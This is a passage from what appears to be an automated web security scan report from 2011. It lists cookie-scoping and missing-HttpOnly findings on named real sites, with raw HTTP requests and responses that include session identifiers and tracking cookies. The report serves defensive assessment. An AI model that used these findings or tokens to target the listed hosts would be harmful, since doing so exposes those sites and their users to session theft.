P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www2
Content-Length: 0
Content-Type: text/plain


14.66. http://paginebianche.ilsole24ore.com/execute.cgi

Summary

Severity:   Information
Confidence:   Certain
Host:   http://paginebianche.ilsole24ore.com
Path:   /execute.cgi

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /execute.cgi HTTP/1.1
Host: paginebianche.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:26:34 GMT
Server: Apache
Set-Cookie: kpi=173.193.214.243.1304375194561290; path=/; expires=Thu, 29-Apr-21 22:26:34 GMT; domain=.ilsole24ore.com
Set-Cookie: PHPSESSID=1ffh2sghlilotqrq20u2nst8a1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: sessionid=1ffh2sghlilotqrq20u2nst8a1; domain=.paginebianche.it
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 30688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="it">
<head><meta http-equiv="Content-Type" content=
...[SNIP]...

14.67. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=5864 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.telecomitalia.it/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1986=2724386019227846218; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1185=2931142961646634775; put_2100=usr3fd49cb9a7122f52; ses9=12566^1; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262494%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263577%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C; put_1994=xrd52zkwjuxh; ruid=154dab7990adc1d6f3372c12^7^1304360282^2915161843; khaos=GMMM8SST-B-HSA1; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%264894%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1; ses2=12338^12&12590^6&12566^1&9346^1&13027^5&13186^6&7477^6; 
csi2=3201767.js^1^1304363134^1304363134&3150337.js^1^1304362966^1304362966&3138805.js^3^1304360977^1304361628&3203287.js^5^1304340348^1304361606&3167235.js^2^1304360282^1304360956&3200913.js^1^1304360305^1304360305&3140640.js^1^1304358971^1304358971&3166420.js^2^1304358895^1304358947&3198218.js^1^1304358916^1304358916&3151967.js^10^1304340353^1304341104&3151648.js^4^1304340357^1304340523&3201777.js^2^1304340371^1304340482&3188003.js^1^1304340382^1304340382&3150134.js^1^1304340344^1304340344&3199967.js^1^1304340334^1304340334; ses15=12590^7&12338^6&13186^5&13027^2&7477^6&12017^1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; cd=false

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:16:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%264894%3D1%262939%3D1%266552%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1; expires=Wed, 01-Jun-2011 22:16:18 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C70%2C2%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C0%2C2%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C; expires=Wed, 01-Jun-2011 22:16:18 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

14.68. http://search.yahoo.com/bin/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.yahoo.com
Path:   /bin/search

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bin/search HTTP/1.1
Host: search.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 22:26:52 GMT
Set-Cookie: B=bpo29tt6rubtc&b=3&s=kb; expires=Tue, 02-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: sSN=3eSvUDo2wWFRGwNfu4Zai5tBVkIRVcnL10fjiylXzSdqNCm1Gni_b8k7hSc2rpURGtOsHmJqBbg7yUFu05.v1w--; path=/; domain=.search.yahoo.com
Location: http://search.yahoo.com/web?fr=
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Cache-Control: private
Content-Length: 86

<!-- syc13.search.ac2.yahoo.com uncompressed/chunked Mon May 2 15:26:52 PDT 2011 -->

14.69. http://secure-it.imrworldwide.com/cgi-bin/m

Summary

Severity:   Information
Confidence:   Certain
Host:   http://secure-it.imrworldwide.com
Path:   /cgi-bin/m

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /cgi-bin/m?rnd=1304399099664&ci=ilsole-it&cg=0&cc=0&sr=1920x1200&cd=16&lg=en-us&je=y&ck=y&tz=-5&ct=lan&hp=y&si=about%3Ablank&rp= HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: secure-it.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:05:00 GMT
Server: Apache
Set-Cookie: V5=AStfNgtNDx0sNh8.HzYjIz8zEBYzFVInHlInHQ__; expires=Fri, 30-Apr-2021 00:05:00 GMT; domain=.imrworldwide.com; path=/cgi-bin
Set-Cookie: IMRID=Tb9GrNTvKWYAAVGXyQw; expires=Fri, 30-Apr-2021 00:05:00 GMT; path=/cgi-bin; domain=.imrworldwide.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.imrworldwide.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND UNI NAV COM"
Connection: close
Content-Type: image/gif
Content-Length: 44

GIF89a.............!.......,...........D..;.

14.70. http://www.bing.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110423; SRCHUID=V=2&GUID=D58F516F401B4DFBA034B7592B1777FD; _UR=; s_nr=1303567291710; s_vnum=1306159291712%26vn%3D2; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; countrycode=US; zipcode=75207; SRCHD=MS=1752452&SM=1&D=1740336&AF=NOFORM; MUID=B506C07761D7465D924574124E3C14DF; usrID=1f9c26d0-fd25-ba11-6fc5-10c3cf0873bc

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Date: Mon, 02 May 2011 21:28:49 GMT
Connection: close
Set-Cookie: _SS=SID=9EEFFDDAEA794F34A5B65EDC1A773E5B; domain=.bing.com; path=/
Content-Length: 28806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" ><head><me
...[SNIP]...

15. Cookie without HttpOnly flag set
There are 203 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



15.1. https://account.musfiber.com/login.php

Summary

Severity:   Low
Confidence:   Firm
Host:   https://account.musfiber.com
Path:   /login.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /login.php HTTP/1.1
Host: account.musfiber.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:32:38 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=bq4jvcopcniq8jdvo0dtnu3n95; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18865

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><!-- InstanceBegin template="/Templates/Main.dwt" codeOutsideHTMLIsLocked="false" -->
<he
...[SNIP]...

15.2. https://areaclienti187.telecomitalia.it/auth/recuperapassword.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /auth/recuperapassword.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/recuperapassword.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:22 GMT
Server: Apache
Cache-Control: No-Cache
Cache-Control: no-cache="set-cookie"
Pragma: No-Cache
Content-Length: 6011
Expires: -1
Set-Cookie: JSESSIONID_AUTH=8xp2N1nh8BBHsHSDpxKfQvZTQGTxjLZYp8L4W6D1dGRYvPJ6SG1G!1105479713; path=/
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<h
...[SNIP]...

15.3. https://areaclienti187.telecomitalia.it/auth/registrautente.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /auth/registrautente.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /auth/registrautente.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:24 GMT
Server: Apache
Cache-Control: No-Cache
Cache-Control: no-cache="set-cookie"
Pragma: No-Cache
Expires: -1
Set-Cookie: JSESSIONID_AUTH=zdfWN1nchhvzYNWhbqpHMStZrjhmgxwlRN3LjKtxyY1jyShhywL4!519317924; path=/
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Vary: Accept-Encoding, User-Agent
Content-Length: 24761

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w
...[SNIP]...

15.4. https://areaclienti187.telecomitalia.it/cdas187/d/a/p18485/serv.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p18485/serv.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p18485/serv.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:24 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=h72QN1ncLn59VV1nLzn2G6CN3GxcTPPH5rL1zPy022ctxnzFxMnC!-1329674579; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

15.5. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21608/serv2.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p21608/serv2.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p21608/serv2.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:30 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=zn7KN1nCQT9GwTtRG9hmSm5nLcMP5Qtv5dTLTh3yhfPQKJRJ6TTK!6541692; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

15.6. https://areaclienti187.telecomitalia.it/cdas187/d/a/p21618/serv3.do

Summary

Severity:   Low
Confidence:   Firm
Host:   https://areaclienti187.telecomitalia.it
Path:   /cdas187/d/a/p21618/serv3.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdas187/d/a/p21618/serv3.do HTTP/1.1
Host: areaclienti187.telecomitalia.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 02 May 2011 22:23:31 GMT
Server: Apache
Cache-Control: no-cache="set-cookie"
Content-Length: 2923
Set-Cookie: JSESSIONID_187CDAS=4894N1nDrQnTjgkyyxpjy5R22JChxQr3lZXQCDMq1pt2gwVLcG3W!-1852540237; path=/cdas187
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding, User-Agent


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

15.7. http://attiva.ilsole24ore.com/pr_home.jsp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://attiva.ilsole24ore.com
Path:   /pr_home.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pr_home.jsp HTTP/1.1
Host: attiva.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:23:34 GMT
Server: Apache/2.0.63 (Unix) mod_jk/1.2.26
X-Powered-By: Servlet 2.4; JBoss-4.2.2.GA (build: SVNTag=JBoss_4_2_2_GA date=200710221139)/Tomcat-5.5
Set-Cookie: JSESSIONID=1BA822532BA5DF3E077B74D8659CF3A1.worker2; Path=/
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 15704


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
<head>
<title>Il Sole 24 ORE.com - Registrazione account Pro</title>
<meta htt
...[SNIP]...

15.8. http://compraonline.mediaworld.it/webapp/wcs/stores/servlet/PartnerVisit

Summary

Severity:   Low
Confidence:   Firm
Host:   http://compraonline.mediaworld.it
Path:   /webapp/wcs/stores/servlet/PartnerVisit

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/PartnerVisit HTTP/1.1
Host: compraonline.mediaworld.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=WJQRQWS10.150.100.106CKOMO; path=/
Date: Mon, 02 May 2011 22:23:40 GMT
Server: IBM_HTTP_Server
Set-Cookie: WC_SESSION_ESTABLISHED=true;Path=/
Set-Cookie: WC_ACTIVESTOREDATA=%2d1%2c0;Path=/
Set-Cookie: WC_USERSESSION_-1002=%2d1002%2cnull%2cnull%2c%2d2000%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%5b0%7cnull%7cnull%7cnull%7c%2d2000%5d%2cFxzPeDXIPd7cX6bMF%2bALqLJIS1E%3d;Path=/
Set-Cookie: JSESSIONID=00008nL4Fpb75tvkGm_qBD0kBDp:15hmqbnap;Path=/
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Length: 2299
Vary: Accept-Encoding
P3P: CP='NOI DSP COR OPTa BUS OTC'
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US

<!--
//********************************************************************
//*-------------------------------------------------------------------
//* Licensed Materials - Property of IBM
//*
/
...[SNIP]...

15.9. http://cp.mightyblue.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cp.mightyblue.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HELM=Password=&Username=; ASPSESSIONIDCCABDABT=KDAKGJPDPIDLCPJOHPKKOIKD

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:25:18 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:25:18 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=&Username=&Password=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=KGAIJAJDPDPMGCEMADNKOION; path=/
ACCEPT-RANGES: none

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...

15.10. http://cp.mightyblue.com/forgotPassword.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cp.mightyblue.com
Path:   /forgotPassword.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forgotPassword.asp?noreturn=yes HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:20:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 4812
Content-Type: text/html
Expires: Sun, 01 May 2011 21:20:28 GMT
Set-Cookie: HELM=Password=&Username=; path=/
Set-Cookie: ASPSESSIONIDCCABDABT=JDAKGJPDBNFFGPKGHBLCENLI; path=/
ACCEPT-RANGES: none


<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /
...[SNIP]...

15.11. http://cp.mightyblue.com/forgotPassword.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://cp.mightyblue.com
Path:   /forgotPassword.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /forgotPassword.asp?noreturn=yes HTTP/1.1
Host: cp.mightyblue.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:27:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
cache-control: no-cache
Content-Length: 4812
Content-Type: text/html
Expires: Sun, 01 May 2011 21:27:28 GMT
Set-Cookie: HELM=Password=&Username=; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=ELBIJAJDLCPFIJBGMHMCMHEA; path=/
ACCEPT-RANGES: none


<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" /
...[SNIP]...

15.12. https://eprocurement.eni.it/default.asp

Summary

Severity:   Low
Confidence:   Firm
Host:   https://eprocurement.eni.it
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.asp HTTP/1.1
Host: eprocurement.eni.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
